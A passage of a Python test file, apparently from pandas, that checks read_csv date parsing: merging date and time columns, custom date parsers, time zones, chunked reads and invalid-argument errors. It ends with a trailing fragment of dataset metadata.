        ["KORD", " 18:56:00", 0.81, 2.81, 7.2, 0.0, 280.0],
        ["KORD", " 19:56:00", 0.01, 2.21, 7.2, 0.0, 260.0],
        ["KORD", " 20:56:00", -0.59, 2.21, 5.7, 0.0, 280.0],
        ["KORD", " 21:18:00", -0.99, 2.01, 3.6, 0.0, 270.0],
        ["KORD", " 21:56:00", -0.59, 1.71, 5.1, 0.0, 290.0],
    ], columns=["X0", "X2", "X3", "X4", "X5", "X6", "X7"], index=index)
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_int_cast(all_parsers):
    """Combine date/time column pairs into "actual"/"nominal" datetime
    columns via ``conv.parse_date_time``."""
    data = ("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
            "KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
            "KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
            "KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
            "KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
            "KORD,19990127, 23:00:00, 22:56:00, -0.5900")
    parse_dates = {"actual": [1, 2], "nominal": [1, 3]}
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None,
                             date_parser=conv.parse_date_time,
                             parse_dates=parse_dates, prefix="X")
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
         "KORD", 0.81],
        [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
         "KORD", 0.01],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
         "KORD", -0.59],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
         "KORD", -0.99],
        [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
         "KORD", -0.59],
        [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
         "KORD", -0.59],
    ], columns=["actual", "nominal", "X0", "X4"])
    # Normalize column order before comparing.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
def test_multiple_date_col_timestamp_parse(all_parsers):
    # Timestamp itself works as date_parser for the merged [0, 1] columns,
    # including the fractional-second part.
    parser = all_parsers
    data = """05/31/2012,15:30:00.029,1306.25,1,E,0,,1306.25
05/31/2012,15:30:00.029,1306.25,8,E,0,,1306.25"""
    result = parser.read_csv(StringIO(data), parse_dates=[[0, 1]],
                             header=None, date_parser=Timestamp)
    expected = DataFrame([
        [Timestamp("05/31/2012, 15:30:00.029"),
         1306.25, 1, "E", 0, np.nan, 1306.25],
        [Timestamp("05/31/2012, 15:30:00.029"),
         1306.25, 8, "E", 0, np.nan, 1306.25]
    ], columns=["0_1", 2, 3, 4, 5, 6, 7])
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_with_header(all_parsers):
    # With a header row present, the merged date+NominalTime column takes
    # the user-provided name "nominal" and moves to the front.
    parser = all_parsers
    data = """\
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000"""
    result = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]})
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "ActualTime", "TDew",
                "TAir", "Windspeed", "Precip", "WindDir"])
    tm.assert_frame_equal(result, expected)
# Merging date columns into a name that already exists (either the
# auto-generated "date_NominalTime" or a user key colliding with "ID")
# must raise a clear ValueError instead of silently overwriting.
@pytest.mark.parametrize("data,parse_dates,msg", [
    ("""\
date_NominalTime,date,NominalTime
KORD1,19990127, 19:00:00
KORD2,19990127, 20:00:00""", [[1, 2]], ("New date column already "
                                        "in dict date_NominalTime")),
    ("""\
ID,date,nominalTime
KORD,19990127, 19:00:00
KORD,19990127, 20:00:00""", dict(ID=[1, 2]), "Date column ID already in dict")
])
def test_multiple_date_col_name_collision(all_parsers, data, parse_dates, msg):
    parser = all_parsers
    with pytest.raises(ValueError, match=msg):
        parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_date_parser_int_bug(all_parsers):
    # A date_parser that converts via int() must receive the raw string of
    # the POSIX-timestamp index column, not a pre-coerced value.
    parser = all_parsers
    data = ("posix_timestamp,elapsed,sys,user,queries,query_time,rows,"
            "accountid,userid,contactid,level,silo,method\n"
            "1343103150,0.062353,0,4,6,0.01690,3,"
            "12345,1,-1,3,invoice_InvoiceResource,search\n")
    result = parser.read_csv(
        StringIO(data), index_col=0, parse_dates=[0],
        date_parser=lambda x: datetime.utcfromtimestamp(int(x)))
    expected = DataFrame([[0.062353, 0, 4, 6, 0.01690, 3, 12345, 1, -1,
                           3, "invoice_InvoiceResource", "search"]],
                         columns=["elapsed", "sys", "user", "queries",
                                  "query_time", "rows", "accountid",
                                  "userid", "contactid", "level",
                                  "silo", "method"],
                         index=Index([Timestamp("2012-07-24 04:12:30")],
                                     name="posix_timestamp"))
    tm.assert_frame_equal(result, expected)
def test_nat_parse(all_parsers):
    # Round-trip a frame containing NaN / NaT holes through to_csv and
    # read_csv; the parsed result must match the original frame.
    parser = all_parsers
    frame = DataFrame({"A": np.asarray(lrange(10), dtype="float64"),
                       "B": pd.Timestamp("20010101")})
    frame.iloc[3:6, :] = np.nan
    with tm.ensure_clean("__nat_parse_.csv") as path:
        frame.to_csv(path)
        result = parser.read_csv(path, index_col=0, parse_dates=["B"])
        tm.assert_frame_equal(result, frame)
def test_csv_custom_parser(all_parsers):
    # A user-supplied date_parser must produce the same frame as the
    # built-in parsing triggered by parse_dates=True.
    parser = all_parsers
    data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""

    def _parse(value):
        return datetime.strptime(value, "%Y%m%d")

    result = parser.read_csv(StringIO(data), date_parser=_parse)
    expected = parser.read_csv(StringIO(data), parse_dates=True)
    tm.assert_frame_equal(result, expected)
def test_parse_dates_implicit_first_col(all_parsers):
    # The data rows have one more field than the header, so the first
    # column becomes the index; parse_dates=True should parse it even
    # without an explicit index_col=0.
    parser = all_parsers
    data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
    expected = parser.read_csv(StringIO(data), index_col=0,
                               parse_dates=True)
    result = parser.read_csv(StringIO(data), parse_dates=True)
    tm.assert_frame_equal(result, expected)
def test_parse_dates_string(all_parsers):
    # Naming a column in both index_col and parse_dates yields a parsed
    # DatetimeIndex carrying that column's name.
    parser = all_parsers
    data = """date,A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
    result = parser.read_csv(StringIO(data), parse_dates=["date"],
                             index_col="date")
    expected_index = date_range("1/1/2009", periods=3, name="date")
    expected = DataFrame({"A": ["a", "b", "c"], "B": [1, 3, 4],
                          "C": [2, 4, 5]}, index=expected_index)
    tm.assert_frame_equal(result, expected)
@pytest.mark.xfail(reason="yearfirst is not surfaced in read_*")
@pytest.mark.parametrize("parse_dates", [
    [["date", "time"]],
    [[0, 1]]
])
def test_yy_format_with_year_first(all_parsers, parse_dates):
    # Two-digit years like "09" should be interpreted year-first, but
    # read_csv does not expose a yearfirst option (hence the xfail).
    data = """date,time,B,C
090131,0010,1,2
090228,1020,3,4
090331,0830,5,6
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), index_col=0,
                             parse_dates=parse_dates)
    index = DatetimeIndex([datetime(2009, 1, 31, 0, 10, 0),
                           datetime(2009, 2, 28, 10, 20, 0),
                           datetime(2009, 3, 31, 8, 30, 0)],
                          dtype=object, name="date_time")
    expected = DataFrame({"B": [1, 3, 5], "C": [2, 4, 6]}, index=index)
    tm.assert_frame_equal(result, expected)
# parse_dates may name columns by position or by label; both spellings
# must behave identically, and dayfirst applies to each parsed column.
@pytest.mark.parametrize("parse_dates", [[0, 2], ["a", "c"]])
def test_parse_dates_column_list(all_parsers, parse_dates):
    data = "a,b,c\n01/01/2010,1,15/02/2010"
    parser = all_parsers
    expected = DataFrame({"a": [datetime(2010, 1, 1)], "b": [1],
                          "c": [datetime(2010, 2, 15)]})
    expected = expected.set_index(["a", "b"])
    result = parser.read_csv(StringIO(data), index_col=[0, 1],
                             parse_dates=parse_dates, dayfirst=True)
    tm.assert_frame_equal(result, expected)
# Date parsing must work for a MultiIndex regardless of the order in
# which the index columns are specified.
@pytest.mark.parametrize("index_col", [[0, 1], [1, 0]])
def test_multi_index_parse_dates(all_parsers, index_col):
    data = """index1,index2,A,B,C
20090101,one,a,1,2
20090101,two,b,3,4
20090101,three,c,4,5
20090102,one,a,1,2
20090102,two,b,3,4
20090102,three,c,4,5
20090103,one,a,1,2
20090103,two,b,3,4
20090103,three,c,4,5
"""
    parser = all_parsers
    index = MultiIndex.from_product([
        (datetime(2009, 1, 1), datetime(2009, 1, 2),
         datetime(2009, 1, 3)), ("one", "two", "three")],
        names=["index1", "index2"])
    # Out of order.
    if index_col == [1, 0]:
        index = index.swaplevel(0, 1)
    expected = DataFrame([["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
                          ["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
                          ["a", 1, 2], ["b", 3, 4], ["c", 4, 5]],
                         columns=["A", "B", "C"], index=index)
    result = parser.read_csv(StringIO(data), index_col=index_col,
                             parse_dates=True)
    tm.assert_frame_equal(result, expected)
# First case: a dayfirst-aware custom parser handles DD/MM/YYYY input.
# Second case: the misspelled "day_first" kwarg must surface as a
# TypeError from the user's date_parser callable.
@pytest.mark.parametrize("kwargs", [
    dict(dayfirst=True), dict(day_first=True)
])
def test_parse_dates_custom_euro_format(all_parsers, kwargs):
    parser = all_parsers
    data = """foo,bar,baz
31/01/2010,1,2
01/02/2010,1,NA
02/02/2010,1,2
"""
    if "dayfirst" in kwargs:
        df = parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
                             date_parser=lambda d: parse_date(d, **kwargs),
                             header=0, index_col=0, parse_dates=True,
                             na_values=["NA"])
        exp_index = Index([datetime(2010, 1, 31), datetime(2010, 2, 1),
                           datetime(2010, 2, 2)], name="time")
        expected = DataFrame({"Q": [1, 1, 1], "NTU": [2, np.nan, 2]},
                             index=exp_index, columns=["Q", "NTU"])
        tm.assert_frame_equal(df, expected)
    else:
        msg = "got an unexpected keyword argument 'day_first'"
        with pytest.raises(TypeError, match=msg):
            parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
                            date_parser=lambda d: parse_date(d, **kwargs),
                            skiprows=[0], index_col=0, parse_dates=True,
                            na_values=["NA"])
def test_parse_tz_aware(all_parsers):
    # A trailing "Z" offset must produce a tz-aware UTC index (gh-1693).
    parser = all_parsers
    csv_text = "Date,x\n2012-06-13T01:39:00Z,0.5"
    result = parser.read_csv(StringIO(csv_text), parse_dates=True,
                             index_col=0)
    expected_index = Index([Timestamp("2012-06-13 01:39:00+00:00")],
                           name="Date")
    expected = DataFrame({"x": [0.5]}, index=expected_index)
    tm.assert_frame_equal(result, expected)
    assert result.index.tz is pytz.utc
# The merged date column may be used as the index whether index_col
# names it ("nominal"), refers to it positionally (0), or the merge was
# requested positionally ([[1, 2]], which auto-names the column).
@pytest.mark.parametrize("parse_dates,index_col", [
    ({"nominal": [1, 2]}, "nominal"),
    ({"nominal": [1, 2]}, 0),
    ([[1, 2]], 0),
])
def test_multiple_date_cols_index(all_parsers, parse_dates, index_col):
    parser = all_parsers
    data = """
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD1,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD2,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD3,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD4,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD5,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD6,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD1", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD2", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD3", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD4", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD5", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD6", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "ActualTime", "TDew",
                "TAir", "Windspeed", "Precip", "WindDir"])
    expected = expected.set_index("nominal")
    if not isinstance(parse_dates, dict):
        # Positional merge specs get the auto-generated joined name.
        expected.index.name = "date_NominalTime"
    result = parser.read_csv(StringIO(data), parse_dates=parse_dates,
                             index_col=index_col)
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_chunked(all_parsers):
    # Merged-date parsing must behave identically when reading in chunks:
    # chunksize=2 over six rows yields three frames that concatenate back
    # to the full expected result.
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "actualTime", "A", "B", "C", "D", "E"])
    expected = expected.set_index("nominal")
    reader = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]},
                             index_col="nominal", chunksize=2)
    chunks = list(reader)
    tm.assert_frame_equal(chunks[0], expected[:2])
    tm.assert_frame_equal(chunks[1], expected[2:4])
    tm.assert_frame_equal(chunks[2], expected[4:])
def test_multiple_date_col_named_index_compat(all_parsers):
    # Specifying the columns to merge by position ([1, 2]) or by header
    # name (["date", "nominalTime"]) must yield identical frames.
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    with_indices = parser.read_csv(StringIO(data),
                                   parse_dates={"nominal": [1, 2]},
                                   index_col="nominal")
    with_names = parser.read_csv(StringIO(data), index_col="nominal",
                                 parse_dates={"nominal": [
                                     "date", "nominalTime"]})
    tm.assert_frame_equal(with_indices, with_names)
def test_multiple_date_col_multiple_index_compat(all_parsers):
    # Using the merged date column inside a MultiIndex must match parsing
    # first and then calling set_index on the same columns.
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    result = parser.read_csv(StringIO(data), index_col=["nominal", "ID"],
                             parse_dates={"nominal": [1, 2]})
    expected = parser.read_csv(StringIO(data),
                               parse_dates={"nominal": [1, 2]})
    expected = expected.set_index(["nominal", "ID"])
    tm.assert_frame_equal(result, expected)
# A scalar string for parse_dates is rejected with the same TypeError
# whether or not an index_col is supplied.
@pytest.mark.parametrize("kwargs", [dict(), dict(index_col="C")])
def test_read_with_parse_dates_scalar_non_bool(all_parsers, kwargs):
    # see gh-5636
    parser = all_parsers
    msg = ("Only booleans, lists, and dictionaries "
           "are accepted for the 'parse_dates' parameter")
    data = """A,B,C
1,2,2003-11-1"""
    with pytest.raises(TypeError, match=msg):
        parser.read_csv(StringIO(data), parse_dates="C", **kwargs)
# Non-bool, non-list, non-dict parse_dates values (tuple, ndarray, set)
# are all rejected with the same TypeError.
@pytest.mark.parametrize("parse_dates", [
    (1,), np.array([4, 5]), {1, 3}
])
def test_read_with_parse_dates_invalid_type(all_parsers, parse_dates):
    parser = all_parsers
    msg = ("Only booleans, lists, and dictionaries "
           "are accepted for the 'parse_dates' parameter")
    data = """A,B,C
1,2,2003-11-1"""
    with pytest.raises(TypeError, match=msg):
        # Pass the parametrized value through; previously this hardcoded
        # parse_dates=(1,), so the ndarray and set cases were never tested.
        parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_parse_dates_empty_string(all_parsers):
    # An empty date field parses to NaT instead of erroring (gh-2263),
    # even with na_filter switched off.
    parser = all_parsers
    csv_text = "Date,test\n2012-01-01,1\n,2"
    result = parser.read_csv(StringIO(csv_text), na_filter=False,
                             parse_dates=["Date"])
    expected_rows = [[datetime(2012, 1, 1), 1], [pd.NaT, 2]]
    expected = DataFrame(expected_rows, columns=["Date", "test"])
    tm.assert_frame_equal(result, expected)
# thousands="." must not mangle date strings that contain "." before
# they reach the date parser, for plain columns and for index columns.
@pytest.mark.parametrize("data,kwargs,expected", [
    ("a\n04.15.2016", dict(parse_dates=["a"]),
     DataFrame([datetime(2016, 4, 15)], columns=["a"])),
    ("a\n04.15.2016", dict(parse_dates=True, index_col=0),
     DataFrame(index=DatetimeIndex(["2016-04-15"], name="a"))),
    ("a,b\n04.15.2016,09.16.2013", dict(parse_dates=["a", "b"]),
     DataFrame([[datetime(2016, 4, 15), datetime(2013, 9, 16)]],
               columns=["a", "b"])),
    ("a,b\n04.15.2016,09.16.2013", dict(parse_dates=True, index_col=[0, 1]),
     DataFrame(index=MultiIndex.from_tuples(
         [(datetime(2016, 4, 15), datetime(2013, 9, 16))], names=["a", "b"]))),
])
def test_parse_dates_no_convert_thousands(all_parsers, data, kwargs, expected):
    # see gh-14066
    parser = all_parsers
    result = parser.read_csv(StringIO(data), thousands=".", **kwargs)
    tm.assert_frame_equal(result, expected)
def test_parse_date_time_multi_level_column_name(all_parsers):
    # With a two-row header (header=[0, 1]) the merged column keeps the
    # flat user name "date_time" while unmerged columns become tuples.
    data = """\
D,T,A,B
date, time,a,b
2001-01-05, 09:00:00, 0.0, 10.
2001-01-06, 00:00:00, 1.0, 11.
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=[0, 1],
                             parse_dates={"date_time": [0, 1]},
                             date_parser=conv.parse_date_time)
    expected_data = [[datetime(2001, 1, 5, 9, 0, 0), 0., 10.],
                     [datetime(2001, 1, 6, 0, 0, 0), 1., 11.]]
    expected = DataFrame(expected_data,
                         columns=["date_time", ("A", "a"), ("B", "b")])
    tm.assert_frame_equal(result, expected)
# conv.parse_date_time merges a date column with one or more time
# columns; covered with a headered file and a headerless file that
# builds two merged columns ("actual" and "nominal") from column 1.
@pytest.mark.parametrize("data,kwargs,expected", [
    ("""\
date,time,a,b
2001-01-05, 10:00:00, 0.0, 10.
2001-01-05, 00:00:00, 1., 11.
""", dict(header=0, parse_dates={"date_time": [0, 1]}),
     DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10],
                [datetime(2001, 1, 5, 0, 0, 0), 1.0, 11.0]],
               columns=["date_time", "a", "b"])),
    (("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
      "KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
      "KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
      "KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
      "KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
      "KORD,19990127, 23:00:00, 22:56:00, -0.5900"),
     dict(header=None, parse_dates={"actual": [1, 2], "nominal": [1, 3]}),
     DataFrame([
         [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
          "KORD", 0.81],
         [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
          "KORD", 0.01],
         [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
          "KORD", -0.59],
         [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
          "KORD", -0.99],
         [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
          "KORD", -0.59],
         [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
          "KORD", -0.59]], columns=["actual", "nominal", 0, 4])),
])
def test_parse_date_time(all_parsers, data, kwargs, expected):
    parser = all_parsers
    result = parser.read_csv(StringIO(data), date_parser=conv.parse_date_time,
                             **kwargs)
    # Python can sometimes be flaky about how
    # the aggregated columns are entered, so
    # this standardizes the order.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
def test_parse_date_fields(all_parsers):
    # year/month/day columns collapse into one "ymd" datetime column
    # through conv.parse_date_fields.
    parser = all_parsers
    data = "year,month,day,a\n2001,01,10,10.\n2001,02,1,11."
    result = parser.read_csv(StringIO(data),
                             date_parser=conv.parse_date_fields,
                             parse_dates={"ymd": [0, 1, 2]},
                             header=0)
    expected_rows = [[datetime(2001, 1, 10), 10.],
                     [datetime(2001, 2, 1), 11.]]
    expected = DataFrame(expected_rows, columns=["ymd", "a"])
    tm.assert_frame_equal(result, expected)
def test_parse_date_all_fields(all_parsers):
    # Six columns (year..second) merge into one "ymdHMS" datetime via
    # conv.parse_all_fields; leading zeros and short fields both parse.
    parser = all_parsers
    data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0,0.0,10.
2001,01,5,10,0,00,1.,11.
"""
    result = parser.read_csv(StringIO(data), header=0,
                             date_parser=conv.parse_all_fields,
                             parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
    expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10.0],
                          [datetime(2001, 1, 5, 10, 0, 0), 1.0, 11.0]],
                         columns=["ymdHMS", "a", "b"])
    tm.assert_frame_equal(result, expected)
def test_datetime_fractional_seconds(all_parsers):
    # Fractional "second" values survive the merge as microseconds
    # (0.123456 -> microsecond=123456).
    parser = all_parsers
    data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0.123456,0.0,10.
2001,01,5,10,0,0.500000,1.,11.
"""
    result = parser.read_csv(StringIO(data), header=0,
                             date_parser=conv.parse_all_fields,
                             parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
    expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0,
                                    microsecond=123456), 0.0, 10.0],
                          [datetime(2001, 1, 5, 10, 0, 0,
                                    microsecond=500000), 1.0, 11.0]],
                         columns=["ymdHMS", "a", "b"])
    tm.assert_frame_equal(result, expected)
def test_generic(all_parsers):
    # Any user callable can combine columns: here year + month collapse
    # to a date pinned to the first of the month.
    parser = all_parsers
    data = "year,month,day,a\n2001,01,10,10.\n2001,02,1,11."

    def _first_of_month(year, month):
        return date(year=int(year), month=int(month), day=1)

    result = parser.read_csv(StringIO(data), header=0,
                             parse_dates={"ym": [0, 1]},
                             date_parser=_first_of_month)
    expected = DataFrame([[date(2001, 1, 1), 10, 10.],
                          [date(2001, 2, 1), 1, 11.]],
                         columns=["ym", "day", "a"])
    tm.assert_frame_equal(result, expected)
def test_date_parser_resolution_if_not_ns(all_parsers):
    # see gh-10245
    # A date_parser that returns second-resolution datetime64 values must
    # not be silently coerced away when used inside a MultiIndex.
    parser = all_parsers
    data = """\
date,time,prn,rxstatus
2013-11-03,19:00:00,126,00E80000
2013-11-03,19:00:00,23,00E80000
2013-11-03,19:00:00,13,00E80000
"""
    def date_parser(dt, time):
        # Combine the two string columns into datetime64[s] values.
        return np_array_datetime64_compat(dt + "T" + time + "Z",
                                          dtype="datetime64[s]")
    result = parser.read_csv(StringIO(data), date_parser=date_parser,
                             parse_dates={"datetime": ["date", "time"]},
                             index_col=["datetime", "prn"])
    datetimes = np_array_datetime64_compat(["2013-11-03T19:00:00Z"] * 3,
                                           dtype="datetime64[s]")
    expected = DataFrame(data={"rxstatus": ["00E80000"] * 3},
                         index=MultiIndex.from_tuples(
                             [(datetimes[0], 126), (datetimes[1], 23),
                              (datetimes[2], 13)], names=["datetime", "prn"]))
    tm.assert_frame_equal(result, expected)
def test_parse_date_column_with_empty_string(all_parsers):
    # see gh-6428
    # A blank value in a parse_dates column keeps the whole column as raw
    # strings rather than raising (the expected frame holds the strings).
    parser = all_parsers
    data = "case,opdate\n7,10/18/2006\n7,10/18/2008\n621, "
    result = parser.read_csv(StringIO(data), parse_dates=["opdate"])
    expected_data = [[7, "10/18/2006"],
                     [7, "10/18/2008"],
                     [621, " "]]
    expected = DataFrame(expected_data, columns=["case", "opdate"])
    tm.assert_frame_equal(result, expected)
# Values with scientific notation parse as floats whether or not date
# parsing was requested on the column.
@pytest.mark.parametrize("data,expected", [
    ("a\n135217135789158401\n1352171357E+5",
     DataFrame({"a": [135217135789158401,
                      135217135700000]}, dtype="float64")),
    ("a\n99999999999\n123456789012345\n1234E+0",
     DataFrame({"a": [99999999999,
                      123456789012345,
                      1234]}, dtype="float64"))
])
@pytest.mark.parametrize("parse_dates", [True, False])
def test_parse_date_float(all_parsers, data, expected, parse_dates):
    # see gh-2697
    #
    # Date parsing should fail, so we leave the data untouched
    # (i.e. float precision should remain unchanged).
    parser = all_parsers
    result = parser.read_csv(StringIO(data), parse_dates=parse_dates)
    tm.assert_frame_equal(result, expected)
def test_parse_timezone(all_parsers):
    # Fixed UTC offsets in the data must survive parsing (gh-22256):
    # +09:00 becomes a FixedOffset(540) aware dtype.
    parser = all_parsers
    data = """dt,val
2018-01-04 09:01:00+09:00,23350
2018-01-04 09:02:00+09:00,23400
2018-01-04 09:03:00+09:00,23400
2018-01-04 09:04:00+09:00,23400
2018-01-04 09:05:00+09:00,23400"""
    result = parser.read_csv(StringIO(data), parse_dates=["dt"])
    expected_dates = pd.date_range(start="2018-01-04 09:01:00",
                                   end="2018-01-04 09:05:00", freq="1min",
                                   tz=pytz.FixedOffset(540))
    expected = DataFrame({"dt": expected_dates,
                          "val": [23350, 23400, 23400, 23400, 23400]})
    tm.assert_frame_equal(result, expected)
| true | true |
f71905580a519f932cc674741f730cc9139a87df | 833 | py | Python | Dataset/Leetcode/valid/102/204.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/102/204.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
